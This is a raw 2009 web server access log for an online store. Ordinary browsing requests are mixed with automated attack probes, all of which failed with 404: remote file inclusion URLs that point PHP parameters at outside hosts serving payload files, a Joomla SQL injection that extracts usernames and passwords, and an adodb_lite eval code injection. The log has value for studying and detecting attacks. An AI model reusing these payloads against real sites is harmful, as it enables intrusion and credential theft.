114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:02 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 200 1623 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:03 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:05 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:05 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:12 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:49:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
216.75.60.116 - - [28/Jun/2009:05:49:36 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:05:49:44 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:05:49:45 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:05:49:54 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
86.109.166.161 - - [28/Jun/2009:05:50:03 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:05:50:03 -0400] "GET /logs/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 212 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:05:50:03 -0400] "GET /index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 207 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:05:50:15 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
209.59.12.99 - - [28/Jun/2009:05:51:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.109.166.161 - - [28/Jun/2009:05:52:20 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:05:52:20 -0400] "GET /logs/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 212 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:05:52:20 -0400] "GET /index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 207 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:05:52:30 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
38.99.13.118 - - [28/Jun/2009:05:52:59 -0400] "GET /logs/access_log.Q109061300 HTTP/1.0" 200 2008810 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
114.46.202.33 - - [28/Jun/2009:05:53:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76246 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:53:58 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:53:58 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:53:59 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:54:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:54:43 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:54:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01260F4D4323260075A008Y+M37+ENG HTTP/1.1" 200 59308 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:54:55 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01260F4D4323260075A008Y+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:54:59 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01260F4349D31600B48008Y+M37+ENG HTTP/1.1" 200 56228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01260F4D4323260075A008Y+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
114.46.202.33 - - [28/Jun/2009:05:55:00 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01260F4349D31600B48008Y+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; zh-tw) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
122.153.28.140 - - [28/Jun/2009:05:56:16 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:56:16 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:56:16 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:56:16 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:56:18 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:56:18 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:05:56:20 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:56:20 -0400] "GET /bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:56:20 -0400] "GET /logs/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:56:20 -0400] "GET /logs/access_log.Q109060900/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.28.140 - - [28/Jun/2009:05:56:20 -0400] "GET /logs/access_log.Q109051600/bbs/kboard.php?board=sub8_1&act=vote&no=18&page=&search_mode=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:05:56:26 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:05:56:26 -0400] "GET /logs/access_log.Q109061300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:05:56:26 -0400] "GET /logs/access_log.Q109052900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:05:56:27 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:56:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.217.29 - - [28/Jun/2009:05:56:59 -0400] "GET /components/com_mambatstaff/mambats/images/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:56:59 -0400] "GET /logs/components/com_mambatstaff/mambats/images/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:56:59 -0400] "GET /logs/access_log.Q109031800/components/com_mambatstaff/mambats/images/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:05:57:02 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:05:57:02 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:05:57:02 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:05:57:05 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:05:57:36 -0400] "GET /logs/access_log.Q107121500 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.151.217.29 - - [28/Jun/2009:05:57:40 -0400] "GET /logs/access_log.Q109052900/components/com_mambatstaff/mambats/images/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:57:53 -0400] "GET /logs/access_log.Q109052800/components/com_mambatstaff/mambats/images/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
123.242.165.138 - - [28/Jun/2009:05:58:21 -0400] "GET //adminhead.php?path[docroot]=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
217.147.29.190 - - [28/Jun/2009:05:58:30 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:58:30 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:05:58:33 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.65.10.238 - - [28/Jun/2009:05:58:42 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:59:02 -0400] "GET /logs/access_log.Q109061100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:59:23 -0400] "GET //index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
